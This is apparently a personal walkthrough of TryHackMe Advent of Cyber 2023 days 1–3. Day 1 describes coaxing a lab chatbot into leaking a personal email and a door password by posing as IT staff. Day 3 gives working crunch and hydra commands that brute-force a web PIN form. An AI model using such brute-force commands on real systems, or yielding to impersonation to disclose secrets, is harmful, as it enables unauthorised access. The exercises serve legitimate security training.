TryHackMe: Advent of Cyber 2023 Days 1-3
[Day 1] Machine learning Chatbot, tell me, if you're really safe?
Well I guess I should have expected some AI/Chatbot in this years AoC with ChatGPT, Bard & the others blowing up this year..... Oh well let's get cracking.
What is McGreedy's personal email address?
Ok, so looking at the prompts we can see we have address book
which lists Tracy as the CEO, unfortunatley the email address listed is the corporate address and not personal.
So how do we get the personal address? Let's just ask.....
What is the password for the IT server room door?
Ok for this one we need to convince the chat bot we a member of IT.
Sorry, you need to be a member of IT to retrieve the password to the IT server room door.
Ok, so looking at the address book we can see Van Developer
listed as a developer & developers are normally classed as IT so lets see if we can convince the bot we are him?
What is the name of McGreedy's secret project?
Using the example form the question we can find the secret project.
[Day 2] Log analysis O Data, All Ye Faithful
Open the notebook "Workbook" located in the directory "4_Capstone" on the VM. Use what you have learned today to analyse the packet capture.
How many packets were captured (looking at the PacketNumber)?
First we need to import the pandas lib and give it a short alias to use
import pandas as pd
Next we need to read in the network_traffic.csv
file and assign it to a variable, we will use df
as in the example code to keep it simpe
df = pd.read_csv('network_traffic.csv')
finaly we will need to use the cout funcion
df = pd.read_csv('network_traffic.csv')
putting it all together we get
import pandas as pd
df = pd.read_csv('network_traffic.csv')
df.count()
Running this code we get the below and need to look at the value fo PacketNumber
for the answer.
What IP address sent the most amount of traffic during the packet capture?
Ok first we need to look at the columns in the csv
- PacketNumber
- Timestamp
- Source
- Destination
- Protocol
As we are looking for the IP address that sent the most traffic we will need to use the Source
column
import pandas as pd
df = pd.read_csv('network_traffic.csv')
df.groupby(['Source']).size()
What was the most frequent protocol?
Ok, so lets use the above by for protocol
import pandas as pd
df = pd.read_csv('network_traffic.csv')
df.groupby(['Protocol']).size()
If you enjoyed today's task, check out the Intro to Log Analysis room.
Check out Intro to Log Analysis
[Day 3] Brute-forcing Hydra is Coming to Town
Using crunch and hydra, find the PIN code to access the control system and unlock the door. What is the flag?
Ok, lets load up the login page http://{MACHINE-IP}:8000/pin.php
Entering a random code we can see that the length is 3
with possible combinations from 000
to FFF
.
So first we need to make a list of all possible combintaions using crunch
.
crunch version 3.6
Crunch can create a wordlist based on criteria you specify. The output from crunch can be sent to the screen, file, or to another program.
Usage: crunch <min> <max> [options]
where min and max are numbers
Please refer to the man page for instructions and examples on how to use crunch.
So lets make our list.
$ crunch 3 3 0123456789ABCDEF -o pin.txt
Crunch will now generate the following amount of data: 16384 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 4096
crunch: 100% completed generating output
To quickly check the start and end to make sure it did what we want we can use head
and tail
which by default show first and last 10 lins
└─$ head pin.txt&& tail pin.txt
000
001
002
003
004
005
006
007
008
009
FF6
FF7
FF8
FF9
FFA
FFB
FFC
FFD
FFE
FFF
Ok, so now we need to use hydra
to try to find the pin. First lets open developer tools
in our browser and capture the POST
request.
Let's copy as CURL
to see all the `POST`` data.
curl 'http://{MACHINE-IP}:8000/login.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://{MACHINE-IP}:8000' -H 'Connection: keep-alive' -H 'Referer: http://{MACHINE-IP}:8000/pin.php' -H 'Cookie: PHPSESSID=13d6214f8be3e8bfe12c8e97253eaac6' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'pin=000'
So now we need to build our hydra
command line.
└─$ hydra -l '' -P pin.txt -f -v {MACHINE-IP} http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-03 16:47:19
[DATA] max 16 tasks per 1 server, overall 16 tasks, 4096 login tries (l:1/p:4096), ~256 tries per task
[DATA] attacking http-post-form://{MACHINE-IP}:8000/login.php:pin=^PASS^:Access denied
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/error.php
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/error.php
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/error.php
.....
.....
.....
.....
.....
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/control.php
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/error.php
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/error.php
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/error.php
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/error.php
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/error.php
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/error.php
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/error.php
[8000][http-post-form] host: {MACHINE-IP} password: [REDACTED]
[STATUS] attack finished for {MACHINE-IP} (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-03 16:48:25
Using the PIN from above we can access the control panel.
Unlocking the door we get the flag.
If you have enjoyed this room please check out the Password Attacks room.
Check out Password Attacks